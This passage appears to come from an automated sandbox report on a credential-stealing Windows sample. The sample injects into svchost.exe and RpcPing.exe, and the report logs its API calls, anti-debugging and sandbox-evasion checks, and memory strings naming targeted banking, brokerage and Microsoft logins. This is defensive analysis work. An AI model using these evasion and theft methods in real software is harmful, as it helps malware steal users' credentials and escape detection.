            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
            Source: N2Qncau2rN.exe Static PE information: real checksum: 0xa961f should be: 0x1655cc
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041206B push ebx; ret 2_2_00412074
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402011 push edx; iretd 2_2_00402032
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00407116 push esi; retf 2_2_00407117
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A9D8 push ebp; retf 2_2_0041A9D9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403210 push eax; ret 2_2_00403212
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00404334 push ebx; ret 2_2_00404335
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004143D7 pushfd ; ret 2_2_004143D8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401BBB pushad ; retf 2_2_00401BBE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A45F push esp; ret 2_2_0041A502
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A463 push esp; ret 2_2_0041A502
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041640E push edi; iretd 2_2_00416429
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A503 push esp; ret 2_2_0041A502
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401DE7 push ds; ret 2_2_00401DF3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00411594 push es; ret 2_2_00411596
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00404E13 push edx; ret 2_2_00404E14
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00406690 push esp; iretd 2_2_00406691
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040A69A push ss; retf 2_2_0040A6A1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00411739 push edx; ret 2_2_0041173A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401FC2 push eax; retf 2_2_00401FC5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00404FC3 push esp; iretd 2_2_00404FC4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx 2_2_034309B6
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Code function: 3_2_04D00C8E push edx; ret 3_2_04D00C8F
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Code function: 3_2_04D104BE pushad ; retf B253h 3_2_04D10507
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Code function: 3_2_04D0D40F push es; ret 3_2_04D0D411
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Code function: 3_2_04D0D5B4 push edx; ret 3_2_04D0D5B5
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Code function: 3_2_04D06515 push ss; retf 3_2_04D0651C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Code function: 3_2_04D0250B push esp; iretd 3_2_04D0250C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Code function: 3_2_04D0DEE6 push ebx; ret 3_2_04D0DEEF
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Code function: 3_2_04D00E3E push esp; iretd 3_2_04D00E3F
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Code function: 3_2_04D02F91 push esi; retf 3_2_04D02F92
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\RpcPing.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\N2Qncau2rN.exe API/Special instruction interceptor: Address: 40DF244
            Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FF90818D7E4
            Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\RpcPing.exe Window / User API: threadDelayed 9827
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-87598
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe API coverage: 3.4 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\RpcPing.exe API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 5360 Thread sleep count: 147 > 30
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 5360 Thread sleep time: -294000s >= -30000s
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 5360 Thread sleep count: 9827 > 30
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 5360 Thread sleep time: -19654000s >= -30000s
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe TID: 5232 Thread sleep time: -80000s >= -30000s
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe TID: 5232 Thread sleep count: 35 > 30
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe TID: 5232 Thread sleep time: -52500s >= -30000s
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe TID: 5232 Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe TID: 5232 Thread sleep time: -38000s >= -30000s
            Source: C:\Windows\SysWOW64\RpcPing.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
            Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 5_2_0048C4E0 FindFirstFileW,FindNextFileW,FindClose, 5_2_0048C4E0
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
            Source: 0J030901P.5.dr Binary or memory string: dev.azure.comVMware20,11696497155j
            Source: 0J030901P.5.dr Binary or memory string: global block list test formVMware20,11696497155
            Source: 0J030901P.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: 0J030901P.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: 0J030901P.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: RpcPing.exe, 00000005.00000002.4127083272.00000000027C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
            Source: 0J030901P.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: 0J030901P.5.dr Binary or memory string: tasks.office.comVMware20,11696497155o
            Source: 0J030901P.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: 0J030901P.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: firefox.exe, 0000000A.00000002.2187338395.000002494D56C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 0J030901P.5.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
            Source: 0J030901P.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: 0J030901P.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: 0J030901P.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: 0J030901P.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: 0J030901P.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: 0J030901P.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: 0J030901P.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: 0J030901P.5.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
            Source: 0J030901P.5.dr Binary or memory string: AMC password management pageVMware20,11696497155
            Source: auuGcaPMTDojV.exe, 00000008.00000002.4128187039.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
            Source: 0J030901P.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: 0J030901P.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: 0J030901P.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: 0J030901P.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: 0J030901P.5.dr Binary or memory string: discord.comVMware20,11696497155f
            Source: 0J030901P.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: 0J030901P.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: 0J030901P.5.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
            Source: 0J030901P.5.dr Binary or memory string: outlook.office.comVMware20,11696497155s
            Source: 0J030901P.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: 0J030901P.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: 0J030901P.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe API call chain: ExitProcess graph end node graph_0-86723
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\RpcPing.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004175D3 LdrLoadDll, 2_2_004175D3
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_040DF4B0 mov eax, dword ptr fs:[00000030h] 0_2_040DF4B0
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_040DF510 mov eax, dword ptr fs:[00000030h] 0_2_040DF510
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Code function: 0_2_040DDEB0 mov eax, dword ptr fs:[00000030h] 0_2_040DDEB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h] 2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h] 2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h] 2_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h] 2_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034D437C mov eax, dword ptr fs:[00000030h] 2_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h] 2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h] 2_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h] 2_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h] 2_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h] 2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h] 2_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h] 2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h] 2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
